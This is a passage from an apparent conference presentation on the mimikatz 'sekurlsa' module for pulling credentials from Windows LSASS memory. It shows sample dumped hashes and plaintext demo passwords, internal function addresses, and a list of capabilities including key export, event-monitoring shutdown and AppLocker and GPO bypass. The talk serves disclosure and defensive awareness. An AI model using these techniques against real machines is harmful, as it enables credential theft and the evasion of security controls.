 * Hash NTLM : cc36cf7a8514893efccd332446158b1a

tspkg :
 * Utilisateur : termuser
 * Domaine : DEMO
 * Mot de passe : waza1234/

wdigest :
 * Utilisateur : termuser
 * Domaine : DEMO
 * Mot de passe : waza1234/

livessp :
 * Utilisateur : sekurlsa@live.fr
 * Domaine : ps:password
 * Mot de passe : waza1234/

kerberos :
 * Utilisateur : termuser
 * Domaine : DEMO.LOCAL
 * Mot de passe : waza1234/

Sample output of the function-search commands :

** lsasrv.dll ** ; Statut recherche : OK :)
@GetCredentials = 000007F9C1C62938
@AddCredential = 000007F9C1C71010
@DeleteCredential = 000007F9C1C61F58
@LsaUnprotectMemory = 000007F9C1C59960
@LsaProtectMemory = 000007F9C1C628A4

** tspkg.dll/lsasrv.dll ** ; Statut recherche : OK :)
@TSGlobalCredTable = 000007F9C1557B20
@LsaUnprotectMemory = 000007F9C1C59960

** wdigest.dll/lsasrv.dll ** ; Statut recherche : OK :)
@l_LogSessList = 000007F9C15E12B0
@LsaUnprotectMemory = 000007F9C1C59960

** livessp.dll/lsasrv.dll ** ; Statut recherche : OK :)
@LiveGlobalLogonSessionList = 000007F9C14E8C68
@LsaUnprotectMemory = 000007F9C1C59960

** kerberos.dll/lsasrv.dll ** ; Statut recherche : OK :)
@KerbGlobalLogonSessionTable = 000007F9C1955AE0
@KerbLogonSessionList = 0000000000000000
@LsaUnprotectMemory = 000007F9C1C59960

mimikatz :: sekurlsa
some ideas

Meterpreter post module

Standalone binary without injection
yeah, it's easy !
read all data (sessions, encrypted passwords)
read all keys and implement your own (un)protectMemory routine !
decrypt / crypt

Extract all of this from a memory dump / hiberfile !

etc.

Make demonstrations to your chief information security officer
Ask Microsoft to work on a better implementation
Maybe offer possibilities to disable or not some functionalities
Think globally about the data really needed for authentication

mimikatz
what else ?

Crypto (mod_mimikatz_crypto, mod_crypto)
Export non-exportable certificates and keys : CryptoAPI, CNG

mod_mimikatz_divers, mod_mimikatz_nogpo, kappfree.dll
Stop event monitoring
Basic GPO bypass
Applocker / SRP bypass

Driver (mimikatz.sys)
Play with tokens & privileges
Display SSDT x86 & x64
List minifilters actions
List Notifications (process / thread / image / registry)
List Objects hooks and procedures

mimikatz
that's all folks !

Thanks to :
my girlfriend for her support (her LSASS crashed a few times)
Positive Technologies for offering me this great opportunity
Microsoft for considering it as normal/acceptable
Security friends/community for their ideas & challenges
You, for your attention !

Questions ?
Don't be shy ;)
especially if you have written down the corresponding slide number

mimikatz
source code

Not available now
I'm not proud of mixing C/C++ and STL in LSASS
Script kiddies will use it without understanding

But a little part of it, for pass the pass, is available
So download it on the mimikatz download page
http://blog.gentilkiwi.com/mimikatz

Blog & Contact

blog/mimikatz : http://blog.gentilkiwi.com/mimikatz
email : benjamin@gentilkiwi.com
Twitter : @gentilkiwi